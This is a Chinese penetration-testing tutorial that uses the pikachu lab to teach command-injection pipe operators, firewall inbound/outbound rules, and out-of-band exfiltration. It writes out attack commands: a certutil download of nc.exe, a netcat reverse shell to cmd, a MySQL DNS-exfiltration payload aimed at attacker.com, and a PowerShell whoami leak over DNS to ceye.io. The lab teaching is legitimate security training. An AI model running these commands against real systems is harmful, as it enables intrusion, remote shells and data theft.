010502管道符_防火墙出入站_不回显带外-渗透命令-基础入门-网络安全

文章目录

1 管道符

复制代码
| (管道符号)
||(逻辑或)
&&(逻辑与)
&(后台任务符号)

windows| & || &&

Linux: `| || & && ; ```,````和;为linux特有

linux演示:

案例演示:pikachu ping命令执行反向链接 ,

分析:

  • 判断为windows系统

  • windows没有自带的nc命令

  • 想办法上传nc

    shell 复制代码
    ping 172.0.0.1 | certutil.exe -urlcache -split -f http://192.168.0.104:80/nc.exe l:\\nc.exe
    ping 172.0.0.1 | 
  • 反弹权限

完成上述步骤后,执行如下命令

shell 复制代码
# windows
ping 127.0.0.1 | l:\\nc.exe -e cmd 192.168.0.105 5566    
# linux
ncat -lvvp 5566

如下图所示:

2 防火墙出入站

这里我们以windows防火墙为例,测试连接。

"防火墙出入站"指的是防火墙规则中数据流动的方向 ,核心是以防火墙所保护的网络或主机为参照点。

简单来说:

  1. 入站 (Inbound / Ingress):
    • 方向:外部网络 (比如互联网)流向防火墙保护的内部网络或主机
    • 例子:
      • 互联网上的用户访问你公司的网站服务器。
      • 外部人员尝试通过 SSH 连接你的内部服务器。
      • 来自互联网的电子邮件到达你的邮件服务器。
    • 防火墙规则作用: 控制谁可以访问你的内部资源以及访问哪些服务(端口)。这是防火墙最主要的防护功能,通常规则设置得比较严格(默认阻止大部分入站连接,只开放必要的服务)。
    • 参照点: 数据是进入被保护的区域。
  2. 出站 (Outbound / Egress):
    • 方向:防火墙保护的内部网络或主机 流向外部网络(比如互联网)。
    • 例子:
      • 你办公室的电脑访问谷歌搜索。
      • 你内部的服务器从外部软件仓库下载更新。
      • 你的邮件服务器向外部发送电子邮件。
    • 防火墙规则作用: 控制内部用户或设备可以访问外部哪些资源(IP、域名、端口、协议) 。规则通常相对宽松(默认允许大部分出站连接),但也用于:
      • 阻止访问恶意网站。
      • 限制访问某些类型的网站(如社交媒体、游戏)。
      • 防止内部恶意软件或受感染主机"回连"到外部命令控制服务器。
      • 防止内部主机进行端口扫描等恶意行为。
    • 参照点: 数据是离开被保护的区域。

关键区别总结:

特性 入站 (Inbound/Ingress) 出站 (Outbound/Egress)
方向 进入受保护网络/主机 离开受保护网络/主机
来源 外部网络 (如互联网) 内部网络/主机
目标 内部网络/主机 外部网络 (如互联网)
主要目的 保护内部资源不被外部访问/攻击 控制内部资源对外部的访问
默认规则 通常较严格 (默认拒绝/阻止大部分连接) 通常较宽松 (默认允许大部分连接)
例子 访问网站服务器、远程桌面连接、接收邮件 浏览网页、下载文件、发送邮件、访问云服务

为什么理解出入站方向很重要?

  1. 精准配置规则: 创建防火墙规则时,必须明确指定规则是应用于入站流量还是出站流量,否则规则无效或达不到预期效果。
  2. 理解安全策略: 防火墙的安全策略核心就是定义"什么入站流量允许进来"和"什么出站流量允许出去"。
  3. 故障排查: 当网络连接出现问题时,判断是入站规则还是出站规则阻止了连接是解决问题的关键第一步。
  4. 合规性与审计: 许多安全标准和法规要求对出入站流量进行明确的控制、监控和审计。

简单记忆方法:

  • 入站: 别人 (外部) 想进来 访问 (内部) 的东西。
  • 出站: (内部) 想出去 访问别人 (外部) 的东西。

理解出入站方向是配置和管理任何防火墙(无论是硬件防火墙、软件防火墙、云防火墙还是主机防火墙)的基础。你需要根据你的安全需求,在出入站两个方向上分别设置允许或拒绝流量的规则。

windows开启防火墙之后,linux无法正向连接windows,即windows防火墙入站被限制。入站放行5566端口之后,正向连接正常,如下图所示:

出站方向同样如此,这里不再演示,因为严进宽出的策略,入站放行即使没有显示禁用5566端口,5566端口入站方向也是被禁止访问的。

3 不回显外带

当命令执行没有显示的回显时,我们不知道是否执行,执行结果是什么,此时可借助外部网站显示。

在网络安全或渗透测试中,"不回显带外"(Out-of-Band, OOB)通常指利用非直接回显的通道传输数据,常用于漏洞利用(如SQL注入、XXE、命令注入等)。以下是常见场景和实现思路:


典型场景

  1. 无回显漏洞利用
    当攻击注入点不返回结果时(如盲注),通过OOB通道将数据外带。
    • 示例SQL盲注 中利用DNS请求外带数据库数据。
  2. 绕过防火墙/过滤
    避免触发基于请求/响应的安全检测。
  3. 隐蔽数据泄露
    通过DNS、HTTP、SMB等协议外传敏感信息。

常见OOB通道

协议 原理 工具
DNS 目标发起DNS查询,攻击者从DNS日志中提取数据 dnslog.cn, Burp Collaborator
HTTP 目标向攻击者服务器发送HTTP请求携带数据 Python http.server, ngrok
SMB 目标访问攻击者伪造的SMB服务器 Impacket smbserver.py

实现示例(以DNS为例)

1. 利用DNS外带数据
sql 复制代码
-- SQL注入示例(MySQL)
LOAD_FILE(CONCAT('\\\\', (SELECT HEX(user())), '.attacker.com\\fake'));
  • 目标向 {hex_data}.attacker.com 发起DNS查询,攻击者从日志中提取数据。
2. 使用工具监听
  • 免费平台 :访问 dnslog.cn 获取临时域名。
  • 专业工具 :Burp Suite 的 Collaborator 模块。

防御建议

  1. 输入严格过滤
    禁止特殊字符(如 \, $, |)。
  2. 限制出站请求
    防火墙规则限制服务器发起DNS/HTTP请求。
  3. 启用日志审计
    监控异常DNS查询或外连行为。
  4. 最小化权限
    数据库/服务使用低权限账户运行。

扩展:无回显OOB自动化工具

  • SQLMap :使用 --dns-domain 参数自动化OOB注入检测。

    复制代码
    sqlmap -u "http://target.com?id=1" --dns-domain=attacker.com
  • XXExploiter :专用于XXE OOB利用(GitHub)。


注意事项

  • 合法性:未经授权测试属违法行为。
  • 隐蔽性:实际攻击中可能被安全设备(如IDS)检测。
  • 依赖环境:目标需能访问外网(如允许DNS解析)。

演示

这里dns我们利用第三方网站,有兴趣的可以自己搭建,有专门教程。

第一步 :注释掉pikachu ping命令执行中结果回显,如下图所示

第二步:下面连接3注册账号,payloads页面找到对应系统的需要执行的命令,我们的是windows

cmd 复制代码
ping 127.0.0.1 | powershell $x=whoami;$x=$x.Replace('\','xxx');$y='.xxx.ceye.io';$z=$x+$y;ping $z
  • xxx:为自己配置

效果如下图所示:

结语

❓QQ:806797785

⭐️仓库地址:https://gitee.com/gaogzhen

⭐️仓库地址:https://github.com/gaogzhen

1\][全栈网络安全 \| 渗透测试 \| 高级红蓝对抗 V2024最新版](https://www.bilibili.com/video/BV123yAYMEwb)\[CP/OL\]. \[2\][棱角社区](https://forum.ywhack.com/bountytips.php?download)\[CP/OL\]. \[3\][CEYE](http://ceye.io/)\[CP/OL\].

相关推荐
qq_243050794 小时前
aflplusplus:开源的模糊测试工具!全参数详细教程!Kali Linux教程!(一)
linux·web安全·网络安全·黑客·渗透测试·模糊测试·kali linux
WHOAMI_老猫6 小时前
xss注入遇到转义,html编码绕过了解一哈
javascript·web安全·渗透测试·xss·漏洞原理
上海云盾-高防顾问13 小时前
云安全与网络安全:核心区别与协同作用解析
安全·web安全
枷锁—sha14 小时前
【DVWA系列】——xss(DOM)——High详细教程
前端·web安全·网络安全·xss
云盾安全防护1 天前
医疗行业网络安全的综合防护策略
网络·安全·web安全
安全系统学习1 天前
网络安全之RCE简单分析
开发语言·python·算法·安全·web安全
恰薯条的屑海鸥1 天前
零基础在实践中学习网络安全-皮卡丘靶场(第十一期-目录遍历模块)
学习·安全·web安全·渗透测试·网络安全学习
网安INF1 天前
CVE-2020-1938源码分析与漏洞复现(Tomcat 文件包含/读取)
java·网络·web安全·网络安全·tomcat·漏洞复现
无名小猴1 天前
bugku 网络安全事件应急响应
web安全